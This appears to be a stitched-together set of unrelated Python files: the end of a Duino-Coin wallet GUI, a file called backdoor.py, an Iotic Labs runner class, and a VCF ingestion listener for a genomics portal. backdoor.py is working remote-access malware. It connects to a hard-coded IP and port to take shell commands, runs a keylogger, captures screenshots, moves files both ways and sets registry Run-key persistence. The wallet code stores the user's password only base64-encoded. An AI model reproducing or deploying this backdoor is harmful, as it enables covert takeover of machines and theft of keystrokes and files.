column=3,
sticky=N + S + W + E,
padx=(0, 10),
pady=(0, 5))
settingsLabel.bind("<Button>", settings_window)
root.iconphoto(True, PhotoImage(file=resources + "duco_color.png"))
start_balance = global_balance
curr_bal = start_balance
profit_calculator(start_balance)
update_balance_labels()
root.mainloop()
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed."
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"pypresence\".")
install("pypresence")
try:
from PIL import Image, ImageTk
except ModuleNotFoundError:
print("Pillow is not installed. "
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"Pillow\".")
install("Pillow")
try:
from notifypy import Notify
except ModuleNotFoundError:
print("Notify-py is not installed. "
+ "Continuing without notification system.")
notificationsEnabled = False
else:
notificationsEnabled = True
try:
from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
backend = default_backend()
except ModuleNotFoundError:
print("Cryptography is not installed. "
+ "Please manually install \"cryptography\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import secrets
except ModuleNotFoundError:
print("Secrets is not installed. "
+ "Please manually install \"secrets\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
from base64 import urlsafe_b64decode as b64d
from base64 import urlsafe_b64encode as b64e
except ModuleNotFoundError:
print("Base64 is not installed. "
+ "Please manually install \"base64\""
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import tronpy
from tronpy.keys import PrivateKey
TRONPY_ENABLED = True
except ModuleNotFoundError:
TRONPY_ENABLED = False
print("Tronpy is not installed. "
+ "Please manually install \"tronpy\" "
+ "if you intend on using wDUCO wrapper.")
else:
try:
tron = tronpy.Tron()
wduco = tron.get_contract("TWYaXdxA12JywrUdou3PFD1fvx2PWjqK9U")
    except Exception:
TRONPY_ENABLED = False
print("Tron-side error, disabling wrapper for this session")
with urlopen(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") as content:
content = content.read().decode().splitlines()
pool_address = content[0]
pool_port = content[1]
if not path.exists(resources):
mkdir(resources)
with sqlconn(resources + "/wallet.db") as con:
cur = con.cursor()
cur.execute(
"""CREATE TABLE IF NOT EXISTS
Transactions(Date TEXT, amount REAL)""")
cur.execute(
"""CREATE TABLE IF NOT EXISTS
UserData(username TEXT, password TEXT, useWrapper TEXT)""")
con.commit()
if not Path(resources + "duco.png").is_file():
urlretrieve("https://i.imgur.com/9JzxR0B.png", resources + "duco.png")
if not Path(resources + "duco_color.png").is_file():
urlretrieve(
"https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/master/"
+ "Resources/duco.png?raw=true",
resources + "duco_color.png")
if not Path(resources + "calculator.png").is_file():
urlretrieve("https://i.imgur.com/iqE28Ej.png",
resources + "calculator.png")
if not Path(resources + "exchange.png").is_file():
urlretrieve("https://i.imgur.com/0qMtoZ7.png",
resources + "exchange.png")
if not Path(resources + "discord.png").is_file():
urlretrieve("https://i.imgur.com/LoctALa.png",
resources + "discord.png")
if not Path(resources + "github.png").is_file():
urlretrieve("https://i.imgur.com/PHEfWbl.png",
resources + "github.png")
if not Path(resources + "settings.png").is_file():
urlretrieve("https://i.imgur.com/NNEI4WL.png",
resources + "settings.png")
if not Path(resources + "transactions.png").is_file():
urlretrieve("https://i.imgur.com/nbVPlKk.png",
resources + "transactions.png")
if not Path(resources + "stats.png").is_file():
urlretrieve("https://i.imgur.com/KRfHZUM.png",
resources + "stats.png")
if not Path(resources + "langs.json").is_file():
urlretrieve(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "Wallet_langs.json",
resources + "langs.json")
# Load language strings depending on system locale
with open(resources + "langs.json", "r", encoding="utf-8") as lang_file:
lang_file = jsonloads(lang_file.read())
try:
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("bg"):
lang = "bulgarian"
elif locale.startswith("nl"):
lang = "dutch"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
except (IndexError, AttributeError):  # getdefaultlocale() may return None
lang = "english"
if __name__ == "__main__":
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count < 1:
root = Tk()
lf = LoginFrame(root)
root.mainloop()
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count >= 1:
loading_window()
cur = con.cursor()
cur.execute("SELECT * FROM UserData")
userdata_query = cur.fetchone()
username = userdata_query[0]
passwordEnc = (userdata_query[1]).decode("utf-8")
password = b64decode(passwordEnc).decode("utf8")
status.config(text=get_string("preparing_wallet_window"))
loading.update()
try:
# Start duco price updater
get_duco_price()
get_balance()
init_rich_presence()
Thread(target=update_rich_presence).start()
try:
# Destroy loading dialog and start the main wallet window
loading.destroy()
except Exception:
pass
root = Tk()
my_gui = Wallet(root)
except Exception as e:
print(e)
_exit(0)
|
backdoor.py
|
import socket
import json
import subprocess
import time
import os
import pyautogui
import keylogger
import threading
import shutil
import sys
def reliable_send(data):
jsondata = json.dumps(data)
s.send(jsondata.encode())
def reliable_recv():
data = ''
while True:
try:
data = data + s.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def is_admin():
global admin
try:
temp = os.listdir(os.sep.join([os.environ.get('SystemRoot', 'C:\windows'),'temp']))
except:
admin = "[!!!]User Privileges!!!"
else :
admin = "[+] Admin Privileges!!!"
def download_file(file_name):
f = open(file_name, 'wb')
s.settimeout(1)
chunk = s.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = s.recv(1024)
except socket.timeout as e:
break
s.settimeout(None)
f.close()
def upload_file(file_name):
f = open(file_name, 'rb')
s.send(f.read())
def screenshot():
myScreenshot = pyautogui.screenshot()
myScreenshot.save('screen.png')
def persist(reg_name, copy_name):
file_location = os.environ['appdata'] + '\\' + copy_name
try:
if not os.path.exists(file_location):
shutil.copyfile(sys.executable, file_location)
subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True)
reliable_send('[+] Created Persistence With Reg Key: ' + reg_name)
else:
reliable_send('[+] Persistence Already Exists')
except:
reliable_send('[+] Error Creating Persistence With The Target Machine')
def connection():
while True:
time.sleep(20)
try:
s.connect(('192.168.43.235', 5555))
shell()
s.close()
break
except:
connection()
def shell():
while True:
command = reliable_recv()
if command == 'quit':
break
elif command == 'background':
pass
elif command == 'help':
pass
elif command == 'clear':
pass
elif command[:3] == 'cd ':
os.chdir(command[3:])
elif command[:5] =='check':
try :
is_admin()
reliable_send(admin)
except:
reliable_send("Something Went Wrong")
elif command[:6] == 'upload':
download_file(command[7:])
elif command[:8] == 'download':
upload_file(command[9:])
elif command[:10] == 'screenshot':
screenshot()
upload_file('screen.png')
os.remove('screen.png')
elif command[:12] == 'keylog_start':
keylog = keylogger.Keylogger()
t = threading.Thread(target=keylog.start)
t.start()
reliable_send('[+] Keylogger Started!')
elif command[:11] == 'keylog_dump':
logs = keylog.read_logs()
reliable_send(logs)
elif command[:11] == 'keylog_stop':
keylog.self_destruct()
t.join()
reliable_send('[+] Keylogger Stopped!')
elif command[:11] == 'persistence':
reg_name, copy_name = command[12:].split(' ')
persist(reg_name, copy_name)
elif command[:7] == 'sendall':
subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE)
else:
execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
result = execute.stdout.read() + execute.stderr.read()
result = result.decode()
reliable_send(result)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()
|
Runner.py
|
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-IoticBulkData/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
from os import getpid, kill, path
from threading import Thread
from time import sleep
import logging
logger = logging.getLogger(__name__)
from IoticAgent import IOT
from .compat import SIGUSR1
from .import_helper import getItemFromModule
from .Stash import Stash
class Runner(object): # pylint: disable=too-many-instance-attributes
def __init__(self, name, config, stop, datapath):
"""
"""
self.__name = name
self.__config = config
self.__stop = stop
self.__datapath = datapath
#
self.__module = None
self.__agentfile = None
self.__workers = 1
#
self.__validate_config()
#
self.__agent = IOT.Client(config=self.__agentfile)
fname = path.join(datapath, name + '.json')
self.__stash = Stash(fname, self.__agent, self.__workers)
self.__modinst = self.__module(self.__stash, self.__config, self.__stop)
self.__thread = None
def __validate_config(self):
if 'import' not in self.__config:
msg = "[%s] Config requires import = module.name" % self.__name
logger.error(msg)
raise ValueError(msg)
self.__module = getItemFromModule(self.__config['import'])
if 'agent' not in self.__config:
msg = "[%s] Config requires agent = /path/to/agent.ini" % self.__name
logger.error(msg)
raise ValueError(msg)
if not path.exists(self.__config['agent']):
msg = "[%s] agent = %s file not found" % (self.__name, self.__config['agent'])
logger.error(msg)
            raise ValueError(msg)  # note: ValueError (not FileNotFoundError) so config problems surface uniformly
self.__agentfile = self.__config['agent']
if 'workers' in self.__config:
self.__workers = int(self.__config['workers'])
def start(self):
self.__agent.start()
self.__thread = Thread(target=self.__run, name=('runner-%s' % self.__name))
self.__thread.start()
def stop(self):
self.__stop.set()
def __run(self):
with self.__stash:
try:
self.__modinst.run()
except:
logger.critical("Runner died! Aborting.", exc_info=True)
kill(getpid(), SIGUSR1)
if not self.__stop.is_set():
while not self.__stash.queue_empty:
logger.info("Runner finished but stop not set! Draining work queue.")
sleep(5)
self.__agent.stop()
def is_alive(self):
return self.__thread.is_alive()
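# Illustrative only: a config mapping of the shape __validate_config() accepts.
# The dotted import path, agent path and worker count below are hypothetical examples,
# not values shipped with this project.
EXAMPLE_RUNNER_CONFIG = {
    'import': 'mypackage.MyIngestor',   # resolved via getItemFromModule()
    'agent': '/path/to/agent.ini',      # must exist on disk
    'workers': '2',                     # optional, parsed with int(); defaults to 1
}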
|
ingestion_listener.py
|
import argparse
import atexit
import boto3
import botocore.exceptions
import cgi
import datetime
import elasticsearch
import io
import json
import os
import psycopg2
import re
import requests # XXX: C4-211 should not be needed but is // KMP needs this, too, until subrequest posts work
import signal
import structlog
import threading
import time
import webtest
import tempfile
from dcicutils.env_utils import is_stg_or_prd_env
from dcicutils.misc_utils import VirtualApp, ignored, check_true, full_class_name, environ_bool, PRINT
from pyramid import paster
from pyramid.httpexceptions import HTTPNotFound, HTTPMovedPermanently # , HTTPServerError
from pyramid.request import Request
# Possibly still needed by some commented-out code.
# from pyramid.response import Response
from pyramid.view import view_config
from snovault.util import debug_log
from vcf import Reader
from .ingestion.vcf_utils import VCFParser, StructuralVariantVCFParser
from .commands.reformat_vcf import runner as reformat_vcf
from .commands.add_altcounts_by_gene import main as add_altcounts
from .ingestion.common import metadata_bundles_bucket, get_parameter, IngestionReport
from .ingestion.exceptions import UnspecifiedFormParameter, SubmissionFailure # , BadParameter
from .ingestion.processors import get_ingestion_processor
# from .types.base import get_item_or_none
from .types.ingestion import SubmissionFolio, IngestionSubmission
from .util import (
resolve_file_path, gunzip_content,
debuglog, get_trusted_email, beanstalk_env_from_request,
subrequest_object, register_path_content_type, vapp_for_email, vapp_for_ingestion,
)
from .ingestion.queue_utils import IngestionQueueManager
from .ingestion.variant_utils import VariantBuilder, StructuralVariantBuilder
log = structlog.getLogger(__name__)
EPILOG = __doc__
INGESTION_QUEUE = 'ingestion_queue'
VARIANT_SCHEMA = resolve_file_path('./schemas/variant.json')
VARIANT_SAMPLE_SCHEMA = resolve_file_path('./schemas/variant_sample.json')
STATUS_QUEUED = 'Queued'
STATUS_INGESTED = 'Ingested'
STATUS_DISABLED = 'Ingestion disabled'
STATUS_ERROR = 'Error'
STATUS_IN_PROGRESS = 'In progress'
SHARED = 'shared'
STRUCTURAL_VARIANT_SCHEMA = resolve_file_path("./schemas/structural_variant.json")
STRUCTURAL_VARIANT_SAMPLE_SCHEMA = resolve_file_path(
"./schemas/structural_variant_sample.json"
)
def includeme(config):
# config.add_route('process_ingestion', '/process_ingestion')
config.add_route('queue_ingestion', '/queue_ingestion')
config.add_route('ingestion_status', '/ingestion_status')
config.add_route('submit_for_ingestion', '/submit_for_ingestion')
config.registry[INGESTION_QUEUE] = IngestionQueueManager(config.registry)
config.scan(__name__)
SUBMISSION_PATTERN = re.compile(r'^/ingestion-submissions/([0-9a-fA-F-]+)(|/.*)$')
register_path_content_type(path='/submit_for_ingestion', content_type='multipart/form-data')
def extract_submission_info(request):
matched = SUBMISSION_PATTERN.match(request.path_info)
if matched:
submission_id = matched.group(1)
else:
raise SubmissionFailure("request.path_info is not in the expected form: %s" % request.path_info)
instance = subrequest_object(request, submission_id)
return submission_id, instance
@view_config(name='submit_for_ingestion', request_method='POST', context=IngestionSubmission,
# Apparently adding this 'accept' causes discrimination on incoming requests not to find this method.
# We do want this type, and instead we check the request to make sure we got it, but we omit it here
# for practical reasons. -kmp 10-Sep-2020
# accept='multipart/form-data',
permission='edit')
@debug_log
def submit_for_ingestion(context, request):
ignored(context)
check_true(request.content_type == 'multipart/form-data', # even though we can't declare we accept this
"Expected request to have content_type 'multipart/form-data'.", error_class=SubmissionFailure)
bs_env = beanstalk_env_from_request(request)
bundles_bucket = metadata_bundles_bucket(request.registry)
datafile = request.POST['datafile']
if not isinstance(datafile, cgi.FieldStorage):
# e.g., specifically it might be b'' when no file is selected,
# but IMPORTANTLY, cgi.FieldStorage has no predefined boolean value,
# so we can't just ask to check 'not datafile'. Sigh. -kmp 5-Aug-2020
raise UnspecifiedFormParameter('datafile')
filename = datafile.filename
override_name = request.POST.get('override_name', None)
parameters = dict(request.POST) # Convert to regular dictionary, which is also a copy
parameters['datafile'] = filename
# Other parameters, like validate_only, will ride in on parameters via the manifest on s3
submission_id, instance = extract_submission_info(request)
# The three arguments institution, project, and ingestion_type were needed in the old protocol
# but are not needed in the new protocol because someone will have set up the IngestionSubmission
# object already with the right values. We tolerate them here, but we insist they be consistent (redundant).
# Note, too, that we use the 'update=True' option that causes them to be added to our parameters if they are
# missing, defaulted from the previous item, so that they will be written to the parameter block stored on S3.
# (We could do that differently now, by looking them up dynamically, but rather than risk making a mistake,
# I just went with path of least resistance for now.)
# -kmp 2-Dec-2020
institution = instance['institution']['@id']
institution_arg = get_parameter(parameters, "institution", default=institution, update=True)
if institution_arg != institution:
# If the "institution" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'institution' was supplied inconsistently for submit_for_ingestion.")
project = instance['project']['@id']
project_arg = get_parameter(parameters, "project", default=project, update=True)
if project_arg != project:
# If the "project" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'project' was supplied inconsistently for submit_for_ingestion.")
ingestion_type = instance['ingestion_type']
ingestion_type_arg = get_parameter(parameters, "ingestion_type", default=ingestion_type, update=True)
if ingestion_type_arg != ingestion_type:
# If the "ingestion_type" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'ingestion_type' was supplied inconsistently for submit_for_ingestion.")
# ``input_file`` contains the actual file data which needs to be
# stored somewhere.
input_file_stream = request.POST['datafile'].file
input_file_stream.seek(0)
# NOTE: Some reference information about uploading files to s3 is here:
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/s3-uploading-files.html
# submission.set_item_detail(object_name=manifest['object_name'], parameters=manifest['parameters'],
# institution=institution, project=project)
# submission_id = str(uuid.uuid4())
_, ext = os.path.splitext(filename)
object_name = "{id}/datafile{ext}".format(id=submission_id, ext=ext)
manifest_name = "{id}/manifest.json".format(id=submission_id)
s3_client = boto3.client('s3')
upload_time = datetime.datetime.utcnow().isoformat()
success = True
message = "Uploaded successfully."
try:
s3_client.upload_fileobj(input_file_stream, Bucket=bundles_bucket, Key=object_name)
except botocore.exceptions.ClientError as e:
log.error(e)
success = False
message = "{error_type}: {error_message}".format(error_type=full_class_name(e), error_message=str(e))
# This manifest will be stored in the manifest.json file on on s3 AND will be returned from this endpoint call.
manifest_content = {
"filename": filename,
"object_name": object_name,
"submission_id": submission_id,
"submission_uri": SubmissionFolio.make_submission_uri(submission_id),
"beanstalk_env_is_prd": is_stg_or_prd_env(bs_env),
"beanstalk_env": bs_env,
"bucket": bundles_bucket,
"authenticated_userid": request.authenticated_userid,
"email": get_trusted_email(request, context="Submission", raise_errors=False),
"success": success,
"message": message,
"upload_time": upload_time,
"parameters": parameters,
}
manifest_content_formatted = json.dumps(manifest_content, indent=2)
if success:
try:
with io.BytesIO(manifest_content_formatted.encode('utf-8')) as fp:
s3_client.upload_fileobj(fp, Bucket=bundles_bucket, Key=manifest_name)
except botocore.exceptions.ClientError as e:
log.error(e)
message = ("{error_type} (while uploading metadata): {error_message}"
.format(error_type=full_class_name(e), error_message=str(e)))
raise SubmissionFailure(message)
queue_manager = get_queue_manager(request, override_name=override_name)
_, failed = queue_manager.add_uuids([submission_id], ingestion_type=ingestion_type)
if failed:
# If there's a failure, failed will be a list of one problem description since we only submitted one thing.
raise SubmissionFailure(failed[0])
if not success:
raise SubmissionFailure(message)
return manifest_content
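# Illustrative client call for the view above (kept commented out; the host, credentials
# and file name are placeholders, not values defined in this codebase):
#
#   import requests
#   with open("metadata_bundle.xlsx", "rb") as fh:
#       resp = requests.post(
#           "https://<portal-host>/ingestion-submissions/<submission-uuid>/submit_for_ingestion",
#           files={"datafile": fh},
#           data={"validate_only": "false"},
#           auth=("<access-key>", "<secret>"),
#       )
#   # On success the response body is the manifest_content dict built above.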
@view_config(route_name='ingestion_status', request_method='GET', permission='index')
@debug_log
def ingestion_status(context, request):
""" Status route, essentially identical to indexing_status. """
ignored(context)
queue_manager = request.registry[INGESTION_QUEUE]
n_waiting, n_inflight = queue_manager.get_counts()
return {
'title': 'Ingestion Status',
'waiting': n_waiting,
'inflight': n_inflight
}
DEBUG_SUBMISSIONS = environ_bool("DEBUG_SUBMISSIONS", default=False)
def process_submission(*, submission_id, ingestion_type, app, bundles_bucket=None, s3_client=None):
bundles_bucket = bundles_bucket or metadata_bundles_bucket(app.registry)
s3_client = s3_client or boto3.client('s3')
manifest_name = "{id}/manifest.json".format(id=submission_id)
data = json.load(s3_client.get_object(Bucket=bundles_bucket, Key=manifest_name)['Body'])
email = None
try:
email = data['email']
except KeyError as e:
debuglog("Manifest data is missing 'email' field.")
if DEBUG_SUBMISSIONS:
pass
# import pdb; pdb.set_trace()
debuglog("processing submission %s with email %s" % (submission_id, email))
with vapp_for_email(email=email, app=app) as vapp:
if DEBUG_SUBMISSIONS:
PRINT("PROCESSING FOR %s" % email)
submission = SubmissionFolio(vapp=vapp, ingestion_type=ingestion_type, submission_id=submission_id, log=None)
handler = get_ingestion_processor(ingestion_type)
result = handler(submission)
if DEBUG_SUBMISSIONS:
PRINT("DONE PROCESSING FOR %s" % email)
return {
"result": result,
"ingestion_type": ingestion_type,
"submission_id": submission_id,
}
def verify_vcf_file_status_is_not_ingested(request, uuid, *, expected=True):
""" Verifies the given VCF file has not already been ingested by checking
'file_ingestion_status'
"""
kwargs = {
'environ': request.environ,
'method': 'GET',
'content_type': 'application/json'
}
subreq = Request.blank('/' + uuid, **kwargs)
resp = request.invoke_subrequest(subreq)
if isinstance(resp, HTTPMovedPermanently): # if we hit a redirect, follow it
subreq = Request.blank(resp.location, **kwargs)
resp = request.invoke_subrequest(subreq)
log.info('VCF File Meta: %s' % resp.json)
verified = bool(expected) is (resp.json.get('file_ingestion_status', None) != STATUS_INGESTED)
# if not verified:
# import pdb; pdb.set_trace()
return verified
def patch_vcf_file_status(request, uuids):
""" Patches VCF File status to 'Queued'
NOTE: This process makes queue_ingestion not scale terribly well.
Batching above a certain number may result in 504. There are
also permissions concerns here that are not dealt with.
"""
for uuid in uuids:
kwargs = {
'environ': request.environ,
'method': 'PATCH',
'content_type': 'application/json',
'POST': json.dumps({
'file_ingestion_status': STATUS_QUEUED
}).encode('utf-8')
}
subreq = Request.blank('/' + uuid, **kwargs)
resp = None
try:
if verify_vcf_file_status_is_not_ingested(request, uuid):
resp = request.invoke_subrequest(subreq)
except HTTPNotFound:
log.error('Tried to patch %s but item does not exist: %s' % (uuid, resp))
@view_config(route_name='queue_ingestion', request_method='POST', permission='index')
@debug_log
def queue_ingestion(context, request):
""" Queues uuids as part of the request body for ingestion. Can batch as many as desired in a
single request.
"""
ignored(context)
uuids = request.json.get('uuids', [])
override_name = request.json.get('override_name', None)
return enqueue_uuids_for_request(request, uuids, override_name=override_name)
def enqueue_uuids_for_request(request, uuids, *, ingestion_type='vcf', override_name=None):
response = {
'notification': 'Failure',
'number_queued': 0,
        'detail': 'Nothing was queued. Make sure to pass a list of uuids in the "uuids" key.'
}
    if not uuids:
return response
queue_manager = get_queue_manager(request, override_name=override_name)
_, failed = queue_manager.add_uuids(uuids)
if not failed:
response['notification'] = 'Success'
response['number_queued'] = len(uuids)
response['detail'] = 'Successfully queued the following uuids: %s' % uuids
if ingestion_type == 'vcf':
patch_vcf_file_status(request, uuids) # extra state management - may not be accurate, hard to get right
else:
response['number_queued'] = len(uuids) - len(failed)
response['detail'] = 'Some uuids failed: %s' % failed
return response
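# Illustrative request/response shapes for queue_ingestion above (uuids are made up):
#   POST /queue_ingestion  {"uuids": ["<file-uuid-1>", "<file-uuid-2>"], "override_name": null}
#   -> {"notification": "Success", "number_queued": 2,
#       "detail": "Successfully queued the following uuids: [...]"}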
def get_queue_manager(request, *, override_name):
return (request.registry[INGESTION_QUEUE]
if not override_name
else IngestionQueueManager(request.registry, override_name=override_name))
class IngestionListener:
""" Organizes helper functions for the ingestion listener """
POLL_INTERVAL = 10 # seconds between each poll
INGEST_AS_USER = environ_bool('INGEST_AS_USER', default=True) # The new way, but possible to disable for now
def __init__(self, vapp, _queue_manager=None, _update_status=None):
self.vapp = vapp
# Get queue_manager
registry = None
if isinstance(self.vapp, (webtest.TestApp, VirtualApp)): # TestApp in testing or VirtualApp in production
registry = self.vapp.app.registry
elif _queue_manager is None: # if we got here, we cannot succeed in starting
raise Exception('Bad arguments given to IngestionListener: %s, %s, %s' %
(self.vapp, _queue_manager, _update_status))
self.queue_manager = IngestionQueueManager(registry) if not _queue_manager else _queue_manager
self.update_status = _update_status
@staticmethod
def should_remain_online(override=None):
""" A function that says whether 'run' should continue. This is provided because it
can be mocked in testing.
:param override: a lambda that will execute when evaluating if specified
:return: True if should stay running, False otherwise
"""
if not override:
return True
return override()
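    # Example of the override hook above (testing sketch only; not used by production code):
    #   remaining = iter([True, True, False])
    #   IngestionListener.should_remain_online(override=lambda: next(remaining))
    # A test could patch should_remain_online with such a lambda to stop run() after
    # a fixed number of polls.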
def get_messages(self):
""" Sleeps (as to not hit SQS too frequently) then requests messages,
returning the result bodies.
NOTE: THIS FUNCTION SHOULD NOT BE USED OUTSIDE OF THIS CODE SINCE
IT BLOCKS FOR RATE LIMITING REASONS
:return: messages available on SQS
"""
time.sleep(self.POLL_INTERVAL) # sleep here before polling again
return self.queue_manager.receive_messages()
def delete_messages(self, messages):
""" Deletes messages from SQS (after they have been processed). Does not return
anything but will log if messages fail deletion.
:param messages: messages to be deleted
"""
        failed = self.queue_manager.delete_messages(messages)
        tries = 3  # bounded retry budget for failed deletions
        while True:
            debuglog("Trying to delete messages")
            if failed:
debuglog("Failed to delete messages")
if tries > 0:
failed = self.queue_manager.delete_messages(failed) # try again
tries -= 1
else:
log.error('Failed to delete messages from SQS: %s' % failed)
break
else:
debuglog("Deleted messages")
break
def _patch_value(self, uuid, field, value):
""" Patches field with value on item uuid """
self.vapp.patch_json('/' + uuid, {field: value})
def patch_ingestion_report(self, report, uuid):
""" Sets the file_ingestion_error field of the given uuid """
if isinstance(report, IngestionReport): # handle normal case
self._patch_value(uuid, 'file_ingestion_error', report.get_errors())
elif isinstance(report, list): # handle when build_ingestion_error_report result is passed
self._patch_value(uuid, 'file_ingestion_error', report)
else:
raise TypeError('Got bad type for ingestion error report: %s' % report)
def set_status(self, uuid, status):
""" Sets the file_ingestion_status of the given uuid """
self._patch_value(uuid, 'file_ingestion_status', status)
@staticmethod
def build_ingestion_error_report(msg):
""" Builds an ingestion error report in case an error is encountered that cannot be recovered from
in VCF ingestion - see file_processed.json for structure definition. """
return [
{
'body': msg,
'row': -1 # this exception may have occurred on a particular row but since it could not be recovered
} # from we assume the msg has sufficient info to work backwards from - Will 4/9/21
]
def run(self):
""" Main process for this class. Runs forever doing ingestion as needed.
HIGH LEVEL LOGIC:
while True:
while there are messages available:
for each message:
download, decompress, ingest, patch file status to "Ingested"
delete processed messages
"""
log.info('Ingestion listener successfully online.')
debuglog("Ingestion listener started.")
messages = [] # This'll get a better value below in each loop iteration. This is just a declaration of intent.
def discard(msg):
self.delete_messages([msg])
# Assuming we didn't get an error trying to remove it,
# it should also get removed from our to-do list.
messages.remove(msg)
while self.should_remain_online():
debuglog("About to get messages.")
messages = self.get_messages() # wait here
debuglog("Got", len(messages), "messages.")
# ingest each VCF file
for message in messages:
debuglog("Message:", message)
body = json.loads(message['Body'])
uuid = body['uuid']
ingestion_type = body.get('ingestion_type', 'vcf') # Older protocol doesn't yet know to expect this
log.info('Ingesting uuid %s' % uuid)
if ingestion_type != 'vcf':
# Let's minimally disrupt things for now. We can refactor this later
# to make all the parts work the same -kmp
if self.INGEST_AS_USER:
try:
debuglog("REQUESTING RESTRICTED PROCESSING:", uuid)
process_submission(submission_id=uuid,
ingestion_type=ingestion_type,
# bundles_bucket=submission.bucket,
app=self.vapp.app)
debuglog("RESTRICTED PROCESSING DONE:", uuid)
except Exception as e:
log.error(e)
else:
submission = SubmissionFolio(vapp=self.vapp, ingestion_type=ingestion_type,
submission_id=uuid)
handler = get_ingestion_processor(ingestion_type)
try:
debuglog("HANDLING:", uuid)
handler(submission)
debuglog("HANDLED:", uuid)
except Exception as e:
log.error(e)
                    # If we succeeded, we don't need to do it again, and if we failed we don't need to fail again.
discard(message)
continue
debuglog("Did NOT process", uuid, "as", ingestion_type)
# locate file meta data
try:
file_meta = self.vapp.get('/' + uuid).follow().json
location = self.vapp.get(file_meta['href']).location
log.info('Got vcf location: %s' % location)
except Exception as e:
log.error('Could not locate uuid: %s with error: %s' % (uuid, e))
continue
# if this file has been ingested (or explicitly disabled), do not do anything with this uuid
if file_meta.get('file_ingestion_status', 'N/A') in [STATUS_INGESTED, STATUS_DISABLED]:
log.error('Skipping ingestion of file %s due to disabled ingestion status' % uuid)
continue
# attempt download with workaround
try:
raw_content = requests.get(location).content
except Exception as e:
log.error('Could not download file uuid: %s with error: %s' % (uuid, e))
continue
# gunzip content, pass to parser, post variants/variant_samples
# patch in progress status
self.set_status(uuid, STATUS_IN_PROGRESS)
# decoded_content = gunzip_content(raw_content)
# debuglog('Got decoded content: %s' % decoded_content[:20])
vcf_type = file_meta.get("variant_type", "SNV")
if vcf_type == "SNV":
# Apply VCF reformat
vcf_to_be_formatted = tempfile.NamedTemporaryFile(suffix='.gz')
vcf_to_be_formatted.write(raw_content)
formatted = tempfile.NamedTemporaryFile()
reformat_args = {
'inputfile': vcf_to_be_formatted.name,
'outputfile': formatted.name,
'verbose': False
}
reformat_vcf(reformat_args)
# Add altcounts by gene
# Note: you cannot pass this file object to vcf.Reader if it's in rb mode
# It's also not guaranteed that it reads utf-8, so pass explicitly
formatted_with_alt_counts = tempfile.NamedTemporaryFile(mode='w+', encoding='utf-8')
alt_counts_args = {
'inputfile': formatted.name,
'outputfile': formatted_with_alt_counts.name
}
add_altcounts(alt_counts_args)
parser = VCFParser(None, VARIANT_SCHEMA, VARIANT_SAMPLE_SCHEMA,
reader=Reader(formatted_with_alt_counts))
variant_builder = VariantBuilder(self.vapp, parser, file_meta['accession'],
project=file_meta['project']['@id'],
institution=file_meta['institution']['@id'])
elif vcf_type == "SV":
                    # No reformatting necessary for SV VCF
decoded_content = gunzip_content(raw_content)
debuglog('Got decoded content: %s' % decoded_content[:20])
formatted_vcf = tempfile.NamedTemporaryFile(
mode="w+", encoding="utf-8"
)
formatted_vcf.write(decoded_content)
formatted_vcf.seek(0)
parser = StructuralVariantVCFParser(
None,
STRUCTURAL_VARIANT_SCHEMA,
STRUCTURAL_VARIANT_SAMPLE_SCHEMA,
reader=Reader(formatted_vcf),
)
variant_builder = StructuralVariantBuilder(
self.vapp,
parser,
file_meta["accession"],
project=file_meta["project"]["@id"],
institution=file_meta["institution"]["@id"],
)
try:
success, error = variant_builder.ingest_vcf()
except Exception as e:
# if exception caught here, we encountered an error reading the actual
# VCF - this should not happen but can in certain circumstances. In this
# case we need to patch error status and discard the current message.
log.error('Caught error in VCF processing in ingestion listener: %s' % e)
self.set_status(uuid, STATUS_ERROR)
self.patch_ingestion_report(self.build_ingestion_error_report(msg=e), uuid)
discard(message)
continue
# report results in error_log regardless of status
msg = variant_builder.ingestion_report.brief_summary()
log.error(msg)
if self.update_status is not None and callable(self.update_status):
self.update_status(msg=msg)
                # if we had errors, record an error status; otherwise patch the file status to 'Ingested'
if error > 0:
self.set_status(uuid, STATUS_ERROR)
